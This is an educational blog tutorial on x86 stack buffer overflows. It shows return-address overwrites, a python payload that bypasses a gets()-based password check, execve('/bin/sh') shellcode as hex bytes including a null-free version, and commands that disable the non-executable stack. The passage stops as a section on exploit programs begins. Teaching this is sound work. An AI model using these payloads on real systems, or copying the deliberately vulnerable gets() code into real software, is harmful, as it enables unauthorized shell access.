REN

Ph.D. in Computer Science at Rutgers University

Buffer Overflow Attack

Buffer overflow is a classic attacking method using input buffer overwriting the memory contents in programs wrote in non-memory safe language such as C and C++. In this article, I'll stress out how to exploit buffer overflow and design attack payload on x86 architecture.

First of all, let's recall some basic knowledge on x86 machine - The activation record layout in x86. A more detailed description could be found in my another blog: Function Call with register EBP and ESP in x86. As we can see the picture below, when there's a subroutine call, the mechanism is that the old value of EBP and return address (instruction that will be first executed after the subroutine's finished) is on the stack. And when the subroutine is finished, EBP will restored and EIP will get the reture address and keep the fetch-decode-execute loop.

   

Modify Return Address

The return address indicates where the program should go after the subroutine call is finished. Is there any way that we could alter the return address and change the program executing flow? The answer is yes! Now let's use an little example on how to do it.

/* test.c */
#include <stdio.h>

int foo(int a) {
	int b = a;
	return b;
}

int main() {
	int i = 3;
	int j = i;
	foo(j);
	j = j + 3;
	printf("j = %d\n", j);
	return 0;
}

This program is quite simple, it'll print "j = 6" in terminal. Our purpose is to skip "j = j + 3;" and make main function return directly by adding some code in function foo. Based on the knowledge I just illustrated. Actually there're two way to do so:

1) Take advantage over the parameter a - using a pointer pointing to a, then moving this pointer to where the return address is located, then add the return address to skip "j = j + 3;".

2) Take advantage over the local variable b - using a pointer pointing to b, then moving this pointer to where the return address is located, then add the return address to skip "j = j + 3;".

Now let's use gdb to disassemble the output to make sure how many steps should we skip:

Let's compile this program in GCC:

gcc -g -m32 -o test test.c

Now we use GDB to disassemble the target program: (on x86_64 Linux using -m32 options when compiling)

(gdb) disassemble foo
Dump of assembler code for function foo:
   0x0804840b <+0>:	push   %ebp
   0x0804840c <+1>:	mov    %esp,%ebp
   0x0804840e <+3>:	sub    $0x10,%esp
   0x08048411 <+6>:	mov    0x8(%ebp),%eax
   0x08048414 <+9>:	mov    %eax,-0x4(%ebp)
   0x08048417 <+12>:	mov    -0x4(%ebp),%eax
   0x0804841a <+15>:	leave  
   0x0804841b <+16>:	ret    
End of assembler dump.
(gdb) disassemble main
Dump of assembler code for function main:
   0x0804841c <+0>:	lea    0x4(%esp),%ecx
   0x08048420 <+4>:	and    $0xfffffff0,%esp
   0x08048423 <+7>:	pushl  -0x4(%ecx)
   0x08048426 <+10>:	push   %ebp
   0x08048427 <+11>:	mov    %esp,%ebp
   0x08048429 <+13>:	push   %ecx
   0x0804842a <+14>:	sub    $0x14,%esp
   0x0804842d <+17>:	movl   $0x3,-0x10(%ebp)
   0x08048434 <+24>:	mov    -0x10(%ebp),%eax
   0x08048437 <+27>:	mov    %eax,-0xc(%ebp)
   0x0804843a <+30>:	pushl  -0xc(%ebp)
   0x0804843d <+33>:	call   0x804840b <foo>
   0x08048442 <+38>:	add    $0x4,%esp
   0x08048445 <+41>:	addl   $0x3,-0xc(%ebp)
   0x08048449 <+45>:	sub    $0x8,%esp
   0x0804844c <+48>:	pushl  -0xc(%ebp)
   0x0804844f <+51>:	push   $0x80484f0
   0x08048454 <+56>:	call   0x80482e0 <printf@plt>
   0x08048459 <+61>:	add    $0x10,%esp
   0x0804845c <+64>:	mov    $0x0,%eax
   0x08048461 <+69>:	mov    -0x4(%ebp),%ecx
   0x08048464 <+72>:	leave  
   0x08048465 <+73>:	lea    -0x4(%ecx),%esp
   0x08048468 <+76>:	ret    
End of assembler dump.

From the disassembler, we could deduce that the return address should be altered by adding 10 from 0x08048442 to 0x0804844c. Now let's make the function foo to be the following:

Either using parameter a

int foo(int a) {	// using parameter a
	int b = a;
	int *c = &a - 1;	// now c is pointing to the return address
	*c += 0x0a;		// modify the return address by adding 0x0a to skip printf
	return b;
}

When running this modifed foo, we could see the program prints "j = 3" instead of 6.

Or using local variable b

int foo(int a) {	// using local variable b
	int b = a + 1;
	int *c = &b + 2;	// now c is pointing to the return address
	*c += 0x0a;		// modify the return address by adding 0x0a to skip printf
	return b;
}

When running this modifed foo, things go strange, there's a core dump and stack smashing detected. So what happened here?

Using gdb to take a look at it, we could see that it's GCC pushed something elso on stack before local variables.

(gdb) x/20xw $ebp
0xffffd228:	0xffffd258	0x080484d1	0x00000003	0x00000007
0xffffd238:	0xf7e33810	0x0804854b	0x00000001	0xffffd304
0xffffd248:	0x00000003	0x00000003	0xf7fb43dc	0xffffd270
0xffffd258:	0x00000000	0xf7e1d637	0xf7fb4000	0xf7fb4000
0xffffd268:	0x00000000	0xf7e1d637	0x00000001	0xffffd304
(gdb) x/20xw $esp
0xffffd210:	0xffffffff	0x0000002f	0xffffd21c	0x5e439b0a
0xffffd220:	0x00008000	0xf7fb4000	0xffffd258	0x080484d1
0xffffd230:	0x00000003	0x00000007	0xf7e33810	0x0804854b
0xffffd240:	0x00000001	0xffffd304	0x00000003	0x00000003
0xffffd250:	0xf7fb43dc	0xffffd270	0x00000000	0xf7e1d637
(gdb) p/x &b
$1 = 0xffffd214

From the gdb info above, we could get return address lays 6 bytes higher than local variable b. Thus we make a sligh modification on function foo:

int foo(int a) {	// using local variable b
	int b = a + 1;
	int *c = &b + 6;	// now c is pointing to the return address
	*c += 0x0a;		// modify the return address by adding 0x0a to skip printf
	return b;
}

This time, we could see the program prints "j = 3" instead of 6.


Stack Buffer Overflow

The previous section gave a way to modify the return address after subroutine call is finished: we use parameters or local variables to locate where the return address is. Now you may wonder in real situation, there’s actually no way for a program user to modify the return address of a certain function by adding a variable in source code or use GDB tools. It’s absolutely impossible! Don’t be frustrated that fast, please consider the following situation: if a function of a program have a variable whose type is char*, and in this function, the content of this char* needs user to type in through stdin. With unsafe functions such as gets() or strcpy(), if we type a char array which is carefully prepared whose length is over given max length and somehow overwrites the return address; Or even keep executing the binary streams in the overwriten array. Boom, we could make it possible!

Level-1: Altering the Return Address to Change Program Flow

Now let's look at a program bof.c below.

/* test.c */
#include <stdio.h>

static char* password = "12345";

int verify() {
	char input[6] = "";
	gets(input);	
	if (strcmp(input, password))
		return -1;
	else
		return 0;
}

void start() {
	printf("Correct password, Welcome!\n");
}

int main() {
	while(-1 == verify());
	start();	
	return 0;
}

Let's compile this program in GCC: (Make sure to use -fno-stack-protector option when compiling!)

gcc -g -m32 -o bof bof.c -fno-stack-protector

This program has a password verification. We cannot get access to function start until we typed in the correct password.

   

We could write a bash shell to use brute force trying every possible password. But why not use buffer overflow attack to do the same thing. Now, let's start:

Step 1: Use objdump to disassemble the ELF executable file. Get the address of function start.

0804846b <verify>:
 804846b:	55                   	push   %ebp
 804846c:	89 e5                	mov    %esp,%ebp
 804846e:	83 ec 18             	sub    $0x18,%esp
 8048471:	c7 45 f2 00 00 00 00 	movl   $0x0,-0xe(%ebp)
 8048478:	66 c7 45 f6 00 00    	movw   $0x0,-0xa(%ebp)
 804847e:	83 ec 0c             	sub    $0xc,%esp
 8048481:	8d 45 f2             	lea    -0xe(%ebp),%eax		# Get the address of local input string is ebp - 0x0e
 8048484:	50                   	push   %eax
 8048485:	e8 a6 fe ff ff       	call   8048330 <gets@plt>
 804848a:	83 c4 10             	add    $0x10,%esp
 804848d:	a1 24 a0 04 08       	mov    0x804a024,%eax
 8048492:	83 ec 08             	sub    $0x8,%esp
 8048495:	50                   	push   %eax
 8048496:	8d 45 f2             	lea    -0xe(%ebp),%eax
 8048499:	50                   	push   %eax
 804849a:	e8 81 fe ff ff       	call   8048320 <strcmp@plt>
 804849f:	83 c4 10             	add    $0x10,%esp
 80484a2:	85 c0                	test   %eax,%eax
 80484a4:	74 07                	je     80484ad <verify+0x42>
 80484a6:	b8 ff ff ff ff       	mov    $0xffffffff,%eax
 80484ab:	eb 05                	jmp    80484b2 <verify+0x47>
 80484ad:	b8 00 00 00 00       	mov    $0x0,%eax
 80484b2:	c9                   	leave  
 80484b3:	c3                   	ret    

080484b4 <start>:
 80484b4:	55                   	push   %ebp
 80484b5:	89 e5                	mov    %esp,%ebp
 80484b7:	83 ec 08             	sub    $0x8,%esp
 80484ba:	83 ec 0c             	sub    $0xc,%esp
 80484bd:	68 86 85 04 08       	push   $0x8048586
 80484c2:	e8 79 fe ff ff       	call   8048340 <puts@plt>
 80484c7:	83 c4 10             	add    $0x10,%esp
 80484ca:	90                   	nop
 80484cb:	c9                   	leave  
 80484cc:	c3                   	ret    

080484cd <main>:
 80484cd:	8d 4c 24 04          	lea    0x4(%esp),%ecx
 80484d1:	83 e4 f0             	and    $0xfffffff0,%esp
 80484d4:	ff 71 fc             	pushl  -0x4(%ecx)
 80484d7:	55                   	push   %ebp
 80484d8:	89 e5                	mov    %esp,%ebp
 80484da:	51                   	push   %ecx
 80484db:	83 ec 04             	sub    $0x4,%esp
 80484de:	90                   	nop
 80484df:	e8 87 ff ff ff       	call   804846b <verify>
 80484e4:	83 f8 ff             	cmp    $0xffffffff,%eax
 80484e7:	74 f6                	je     80484df <main+0x12>
 80484e9:	e8 c6 ff ff ff       	call   80484b4 <start>		# The entrance point of start
 80484ee:	b8 00 00 00 00       	mov    $0x0,%eax
 80484f3:	83 c4 04             	add    $0x4,%esp
 80484f6:	59                   	pop    %ecx
 80484f7:	5d                   	pop    %ebp
 80484f8:	8d 61 fc             	lea    -0x4(%ecx),%esp
 80484fb:	c3                   	ret    
 80484fc:	66 90                	xchg   %ax,%ax
 80484fe:	66 90                	xchg   %ax,%ax

Step 2: Design the input string to overwrite the return address.

Since we already get the entrance point of function start, and we could get where the local variable storing input password. Before gets is invoked, the address of that local variable must be pushed on stack. Then we get lea -0xe(%ebp),%eax and push %eax, which means the address of local variable storing input is ebp - 0x0e. So the offset ought to be 0x0e + 0x04 = 0x12. Then we'll design the input string to overwrite the return address:

python -c 'print "a"*18 + "\xe9\x84\x04\x08"' > ./payload

Then just redirect input from standard I/O to the file payload I just created.

   


Level-2: Inject Code into Buffer to Spawn Shell

Level-1 just altering the return adress and skipped the password verification. How can we do it futher more? Since we know that we're gonna change the return address, we can modify it to a malicious program that we created. But two programs are in different memory address space. Thus, we could overwrite the buffer with some instructions we created, and let return address pointing to those instructions. if those instructions invokes a setuid program, we could easily get the root shell of system.

Step 1: Design a shell code to get root previledge

The directory of bash shell is "/bin/sh". To execute the shell, we could invoke the exceve system call. In order to invoke the system call, we need to make a trap. The x86 interrupt vector table shows that hardware interrupt number is from INT 00 to INT 1F. From INT 20 to INT FF is defined by the operating system. Different OSes have different interrupt vector tables. For this article, we'll look up in Linux interrupt vector table. And we find that to make a system call, We need to use INT 80. And system call number for exceve is 0x0b. Maybe it's hard to write shell code in assembly directly. We can write a C language verison of shell code, and use Objdump or GDB to see what the compiler did for it.

Here's the C code for running a shell:

void main() {
   char *name[2];

   name[0] = "/bin/sh";
   name[1] = NULL;
   execve(name[0], name, NULL);
}

Let's compile this program in GCC: (Make sure to use -fno-plt option on a earlier version of GCC when compiling!)

gcc -g -m32 -o spawn spawn.c -fno-plt

Now, see how GCC made it by using gdb:

(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 
: pushl %ebp 0x8000131 : movl %esp,%ebp 0x8000133 : subl $0x8,%esp 0x8000136 : movl $0x80027b8,0xfffffff8(%ebp) 0x800013d : movl $0x0,0xfffffffc(%ebp) 0x8000144 : pushl $0x0 0x8000146 : leal 0xfffffff8(%ebp),%eax 0x8000149 : pushl %eax 0x800014a : movl 0xfffffff8(%ebp),%eax 0x800014d : pushl %eax 0x800014e : call 0x80002bc <__execve> 0x8000153 : addl $0xc,%esp 0x8000156 : movl %ebp,%esp 0x8000158 : popl %ebp 0x8000159 : ret End of assembler dump. (gdb) disassemble __execve Dump of assembler code for function __execve: 0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+1>: movl %esp,%ebp 0x80002bf <__execve+3>: pushl %ebx 0x80002c0 <__execve+4>: movl $0xb,%eax 0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx 0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx 0x80002cb <__execve+15>: movl 0x10(%ebp),%edx 0x80002ce <__execve+18>: int $0x80 0x80002d0 <__execve+20>: movl %eax,%edx 0x80002d2 <__execve+22>: testl %edx,%edx 0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42> 0x80002d6 <__execve+26>: negl %edx 0x80002d8 <__execve+28>: pushl %edx 0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location> 0x80002de <__execve+34>: popl %edx 0x80002df <__execve+35>: movl %edx,(%eax) 0x80002e1 <__execve+37>: movl $0xffffffff,%eax 0x80002e6 <__execve+42>: popl %ebx 0x80002e7 <__execve+43>: movl %ebp,%esp 0x80002e9 <__execve+45>: popl %ebp 0x80002ea <__execve+46>: ret 0x80002eb <__execve+47>: nop End of assembler dump.

The definition of execve is:

int execve(const char *filename, char *const argv[], char *const envp[]);

From the assembly code and based on what I just illustrated, we could get a point. In order to invoke system call execve, put system call number 0x0b to EAX, put address of file string to EBX, put the address storing address of file to ECX, and finally put address of NULL string to EDX. Moreover, if we also invoked system call exit, the possibility to exploiting is gonna increase. Now, we can build our shell code.

movl	$0xb, %eax			# set system call number
movl	(address of "/bin/sh"), %ebx
leal	(address of "/bin/sh"), %ecx
leal	(address of NULL), %edx
int	$0x80				# make execve system call
movl	$0x1, %eax
movl	$0x0, %ebx
int	$0x80				# make exit system call
.string \"/bin/sh\"

Now the problem we are facing is that we didn't know the address of string "/bin/sh" when we're design our shell code because it's only available in runtime. Do we have any method to do this? Absolutely yes! Remembering the function call mechanism in x86, the return address was pushed in stack. Thus, if we make a function call right before "/bin/sh" was defined, then the address of "/bin/sh" will be in stack, then we use pop to get it! Based on what I said above, the shell code should look like this:

	jmp dummy
start:	popl	%esi			# get the address of "/bin/sh"
	movl	%esi, 0x8(%esi)		# storing the address of "/bin/sh" in memory
	movb	$0x0, 0x7(%esi)		# set '\0' to the end of "/bin/sh"
	movl	$0x0, 0xc(%esi) 	# address 0x0 used for NULL pointer
	movl	$0xb, %eax
	movl	%esi, %ebx
	leal	0x8(%esi), %ecx
	leal	0xc(%esi), %edx
	int	$0x80			# make execve system call
	movl	$0x1, %eax
	movl	$0x0, %ebx
	int	$0x80			# make exit system call
dummy:	call start 
	.string \"/bin/sh\"

Now, we make it in an assembly file payload.s

.section .data
.section .text
.globl _start

_start:
	jmp	dummy
start:	popl	%esi
	movl	%esi, 0x8(%esi)
	movb	$0x0, 0x7(%esi)
	movl	$0x0, 0xc(%esi)
	movl	$0xb, %eax
	movl	%esi, %ebx
	leal	0x8(%esi), %ecx
	leal	0xc(%esi), %edx
	int	$0x80			
	movl	$0x1, %eax
	movl	$0x0, %ebx
	int	$0x80			
dummy:	call start 
	.string "/bin/sh"

Let's assemble and load this assembly code: (Make sure to use -m elf_i386 option when loading!)

as --32 payload.s -o payload.o && ld -m elf_i386 -o payload payload.o

Now we use objdump to get the hexadecimal number of those instructions:

08048054 <_start>:
 8048054:	eb 2a                	jmp    8048080 <dummy>

08048056 <start>:
 8048056:	5e                   	pop    %esi
 8048057:	89 76 08             	mov    %esi,0x8(%esi)
 804805a:	c6 46 07 00          	movb   $0x0,0x7(%esi)
 804805e:	c7 46 0c 00 00 00 00 	movl   $0x0,0xc(%esi)
 8048065:	b8 0b 00 00 00       	mov    $0xb,%eax
 804806a:	89 f3                	mov    %esi,%ebx
 804806c:	8d 4e 08             	lea    0x8(%esi),%ecx
 804806f:	8d 56 0c             	lea    0xc(%esi),%edx
 8048072:	cd 80                	int    $0x80
 8048074:	b8 01 00 00 00       	mov    $0x1,%eax
 8048079:	bb 00 00 00 00       	mov    $0x0,%ebx
 804807e:	cd 80                	int    $0x80

08048080 <dummy>:
 8048080:	e8 d1 ff ff ff       	call   8048056 <start>
 8048085:	2f                   	das    
 8048086:	62 69 6e             	bound  %ebp,0x6e(%ecx)
 8048089:	2f                   	das    
 804808a:	73 68                	jae    80480f4 <dummy+0x74>

Now, testing our shell code by using local variable to locate return address:

/* test.c */
#include <stdio.h>

char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3"
				   "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80"
				   "\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main() {

	int *ret;
	ret = (int*)ret + 2;
	*ret = (int)shellcode;

	return 0;
}

The code above I reference from Aleph One's classical article about buffer overflow attack. Note that use a local variable to locate return address may not be useful in some compilers. Thus, it's preferable to use function pointers:

/* test.c */
#include <stdio.h>

char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3"
				   "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80"
				   "\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main() {

	int (*func)();
	func = (int (*)()) shellcode;
	(int)(*func)();

	return 0;
}

Now, let's compile it with GCC

gcc -g -m32 -o testshellcode testshellcode.c

The result shows segmentation fault. Finally, I found that there's already a mechanism to protect stack from stack smashing attack -- Non-Executable Stack. We can clear see that in the age of mid 1990s, buffer overflow attack is a rather "new" method based on a classical article by Aleph One; Some code or methods used in that article is no longer useful because those weakness were already fixed in system or in compiler. Thus, system security area is changing rapidly every second. We always need to learn something new.

   

So, we need to install a package to enable executing code on stack and eliminate stack non-executing flag in the ELF format file by using execstack -s command.

sudo apt-get install execstack && execstack -s testshellcode && ./testshellcode

   

Now we get the shell. The reason that why it's not root shell here because the sticky bit of previlidge of this program is not set.

From Aleph One's article, recall the shell code we just created, there're several null bytes which are possible to be processed with the end of string. Thus, it's preferable to use non-null shell code. To achieve this, we could use several instructions instead:

.section .data
.section .text
.globl _start

_start:
	jmp	dummy
start:	popl	%esi
	movl	%esi, 0x8(%esi)
	xorl	%eax, %eax		# newly added
	movb	%eax, 0x7(%esi)		# movb	$0x0, 0x7(%esi)
	movl	%eax, 0xc(%esi)		# movl	$0x0, 0xc(%esi)
	movb	$0xb, %al		# movl	$0xb, %eax
	movl	%esi, %ebx
	leal	0x8(%esi), %ecx
	leal	0xc(%esi), %edx
	int	$0x80
	xorl	%ebx, %ebx		# newly added
	movl	%ebx, %eax		# movl	$0x1, %eax
	inc	%eax			# movl	$0x0, %ebx
	int	$0x80			
dummy:	call start 
	.string "/bin/sh"

Now we use objdump to get the hexadecimal number of those instructions:

8048054 <_start>:
 8048054:	eb 1f                	jmp    8048075 <dummy>

08048056 <start>:
 8048056:	5e                   	pop    %esi
 8048057:	89 76 08             	mov    %esi,0x8(%esi)
 804805a:	31 c0                	xor    %eax,%eax
 804805c:	88 46 07             	mov    %al,0x7(%esi)
 804805f:	89 46 0c             	mov    %eax,0xc(%esi)
 8048062:	b0 0b                	mov    $0xb,%al
 8048064:	89 f3                	mov    %esi,%ebx
 8048066:	8d 4e 08             	lea    0x8(%esi),%ecx
 8048069:	8d 56 0c             	lea    0xc(%esi),%edx
 804806c:	cd 80                	int    $0x80
 804806e:	31 db                	xor    %ebx,%ebx
 8048070:	89 d8                	mov    %ebx,%eax
 8048072:	40                   	inc    %eax
 8048073:	cd 80                	int    $0x80

08048075 <dummy>:
 8048075:	e8 dc ff ff ff       	call   8048056 <start>
 804807a:	2f                   	das    
 804807b:	62 69 6e             	bound  %ebp,0x6e(%ecx)
 804807e:	2f                   	das    
 804807f:	73 68                	jae    80480e9 <dummy+0x74>
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
				   "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"
				   "\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main() {

	int (*func)();
	func = (int (*)()) shellcode;
	(int)(*func)();

	return 0;
}

Now, let's compile it with GCC

gcc -g -m32 -o testshellcode testshellcode.c && execstack -s testshellcode && ./testshellcode

This time, we get the shell again.

   


Step 2: Detect Return Address

Now we have our shell code to get root shell, the problem we're facing is when we're deploying a stack smashing attack, we don't know the offset of string we're overwriting. Thus, we don't know where the return address is either. There're several methods to detect this location.

Method 1: Find Evidence by Guessing or Disassembling the Target Program

This is the easiest way. We can always guess because for every single program, the stack starts at the same virtual address due to virtual memory mechanism. And most programs do not push more than a few hundred or a few thousand bytes into the stack at any one time. Virtual memory isolates different processes to provide memory protection, but, in my opinion, make it easier for exploiting stack smashing attack! Sounds quite interesting. But it's not a good choice. For simple programs, we could use disassemble tools such as objdump to get the assembly code for target program, and find some evidence. I'm gonna use the example I used in the last section:

/* test.c */
#include <stdio.h>

static char* password = "12345";

int verify() {
	char input[6] = "";
	gets(input);	
	if (strcmp(input, password))
		return -1;
	else
		return 0;
}

void start() {
	printf("Correct password, Welcome!\n");
}

int main() {
	while(-1 == verify());
	start();	
	return 0;
}

Use objdump to disassemble the ELF executable file.

0804846b <verify>:
 804846b:	55                   	push   %ebp
 804846c:	89 e5                	mov    %esp,%ebp
 804846e:	83 ec 18             	sub    $0x18,%esp
 8048471:	c7 45 f2 00 00 00 00 	movl   $0x0,-0xe(%ebp)
 8048478:	66 c7 45 f6 00 00    	movw   $0x0,-0xa(%ebp)
 804847e:	83 ec 0c             	sub    $0xc,%esp
 8048481:	8d 45 f2             	lea    -0xe(%ebp),%eax		# Get the address of local input string is ebp - 0x0e
 8048484:	50                   	push   %eax
 8048485:	e8 a6 fe ff ff       	call   8048330 <gets@plt>	# Invoke gets()
 804848a:	83 c4 10             	add    $0x10,%esp
   ...
 80484ad:	b8 00 00 00 00       	mov    $0x0,%eax
 80484b2:	c9                   	leave  
 80484b3:	c3                   	ret    

080484b4 <start>:
 80484b4:	55                   	push   %ebp
 80484b5:	89 e5                	mov    %esp,%ebp
   ...
 80484cb:	c9                   	leave  
 80484cc:	c3                   	ret    

080484cd <main>:
 80484cd:	8d 4c 24 04          	lea    0x4(%esp),%ecx
 80484d1:	83 e4 f0             	and    $0xfffffff0,%esp
   ...
 80484fb:	c3                   	ret    
 80484fc:	66 90                	xchg   %ax,%ax
 80484fe:	66 90                	xchg   %ax,%ax

From the assembly code above, before the gets is invoked, the address of the string we want to overwrite must be pushed on stack because it's the mechanism of function call in x86. Thus, we could trace back for several instructions, and we find lea -0xe(%ebp),%eax, and this should be the address of the string we are looking for. This string is a local variable in function verify(), so the offset of return address after verify() should be 0x0e + 0x04 = 0x12.

   

Method 2: Write an Exploiting Program

Guessing or Finding evidence by disassembling has limitations. For a large program, we have to guess over thousands of times. And it's sometimes extremely hard to find among millions of instructions. So, why not writing a program to detect it?